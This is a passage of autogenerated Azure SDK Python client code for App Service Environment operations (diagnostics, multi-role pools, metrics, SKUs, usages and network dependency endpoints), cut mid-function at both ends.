_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.HostingEnvironmentDiagnostics]
request = build_get_diagnostics_item_request(
resource_group_name=resource_group_name,
name=name,
diagnostics_name=diagnostics_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_diagnostics_item.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('HostingEnvironmentDiagnostics', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_diagnostics_item.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics/{diagnosticsName}"} # type: ignore
@distributed_trace
def get_inbound_network_dependencies_endpoints(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.InboundEnvironmentEndpointCollection]:
"""Get the network endpoints of all inbound dependencies of an App Service Environment.
Get the network endpoints of all inbound dependencies of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InboundEnvironmentEndpointCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.InboundEnvironmentEndpointCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.InboundEnvironmentEndpointCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_inbound_network_dependencies_endpoints_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_inbound_network_dependencies_endpoints.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_get_inbound_network_dependencies_endpoints_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("InboundEnvironmentEndpointCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_inbound_network_dependencies_endpoints.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/inboundNetworkDependenciesEndpoints"} # type: ignore
@distributed_trace
def list_multi_role_pools(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.WorkerPoolCollection]:
"""Get all multi-role pools.
Get all multi-role pools.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WorkerPoolCollection or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WorkerPoolCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_pools_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_pools.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_pools_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WorkerPoolCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_pools.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools"} # type: ignore
@distributed_trace
def get_multi_role_pool(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.WorkerPoolResource:
"""Get properties of a multi-role pool.
Get properties of a multi-role pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkerPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
request = build_get_multi_role_pool_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_multi_role_pool.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_multi_role_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default"} # type: ignore
def _create_or_update_multi_role_pool_initial(
self,
resource_group_name: str,
name: str,
multi_role_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> _models.WorkerPoolResource:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
_json = self._serialize.body(multi_role_pool_envelope, 'WorkerPoolResource')
request = build_create_or_update_multi_role_pool_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_multi_role_pool_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_multi_role_pool_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default"} # type: ignore
@distributed_trace
def begin_create_or_update_multi_role_pool(
self,
resource_group_name: str,
name: str,
multi_role_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> LROPoller[_models.WorkerPoolResource]:
"""Create or update a multi-role pool.
Create or update a multi-role pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param multi_role_pool_envelope: Properties of the multi-role pool.
:type multi_role_pool_envelope: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either WorkerPoolResource or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_multi_role_pool_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
multi_role_pool_envelope=multi_role_pool_envelope,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update_multi_role_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default"} # type: ignore
@distributed_trace
def update_multi_role_pool(
self,
resource_group_name: str,
name: str,
multi_role_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> _models.WorkerPoolResource:
"""Create or update a multi-role pool.
Create or update a multi-role pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param multi_role_pool_envelope: Properties of the multi-role pool.
:type multi_role_pool_envelope: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkerPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
_json = self._serialize.body(multi_role_pool_envelope, 'WorkerPoolResource')
request = build_update_multi_role_pool_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.update_multi_role_pool.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_multi_role_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default"} # type: ignore
@distributed_trace
def list_multi_role_pool_instance_metric_definitions(
self,
resource_group_name: str,
name: str,
instance: str,
**kwargs: Any
) -> Iterable[_models.ResourceMetricDefinitionCollection]:
"""Get metric definitions for a specific instance of a multi-role pool of an App Service
Environment.
Get metric definitions for a specific instance of a multi-role pool of an App Service
Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param instance: Name of the instance in the multi-role pool.
:type instance: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceMetricDefinitionCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.ResourceMetricDefinitionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.ResourceMetricDefinitionCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_pool_instance_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
instance=instance,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_pool_instance_metric_definitions.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_pool_instance_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
instance=instance,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ResourceMetricDefinitionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_pool_instance_metric_definitions.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/instances/{instance}/metricdefinitions"} # type: ignore
@distributed_trace
def list_multi_role_metric_definitions(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.ResourceMetricDefinitionCollection]:
"""Get metric definitions for a multi-role pool of an App Service Environment.
Get metric definitions for a multi-role pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceMetricDefinitionCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.ResourceMetricDefinitionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.ResourceMetricDefinitionCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_metric_definitions.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ResourceMetricDefinitionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_metric_definitions.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/metricdefinitions"} # type: ignore
@distributed_trace
def list_multi_role_pool_skus(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.SkuInfoCollection]:
"""Get available SKUs for scaling a multi-role pool.
Get available SKUs for scaling a multi-role pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SkuInfoCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.SkuInfoCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.SkuInfoCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_pool_skus_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_pool_skus.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_pool_skus_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SkuInfoCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_pool_skus.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/skus"} # type: ignore
@distributed_trace
def list_multi_role_usages(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.UsageCollection]:
"""Get usage metrics for a multi-role pool of an App Service Environment.
Get usage metrics for a multi-role pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either UsageCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.UsageCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.UsageCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_multi_role_usages_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_multi_role_usages.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_multi_role_usages_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("UsageCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_multi_role_usages.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/usages"} # type: ignore
@distributed_trace
def list_operations(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> List[_models.Operation]:
"""List all currently running operations on the App Service Environment.
List all currently running operations on the App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of Operation, or the result of cls(response)
:rtype: list[~azure.mgmt.web.v2019_08_01.models.Operation]
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[List[_models.Operation]]
request = build_list_operations_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_operations.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[Operation]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_operations.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/operations"} # type: ignore
@distributed_trace
def get_outbound_network_dependencies_endpoints(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.OutboundEnvironmentEndpointCollection]:
"""Get the network endpoints of all outbound dependencies of an App Service Environment.
Get the network endpoints of all outbound dependencies of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either OutboundEnvironmentEndpointCollection or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.OutboundEnvironmentEndpointCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.OutboundEnvironmentEndpointCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_outbound_network_dependencies_endpoints_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_outbound_network_dependencies_endpoints.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_get_outbound_network_dependencies_endpoints_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("OutboundEnvironmentEndpointCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_outbound_network_dependencies_endpoints.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/outboundNetworkDependenciesEndpoints"} # type: ignore
@distributed_trace
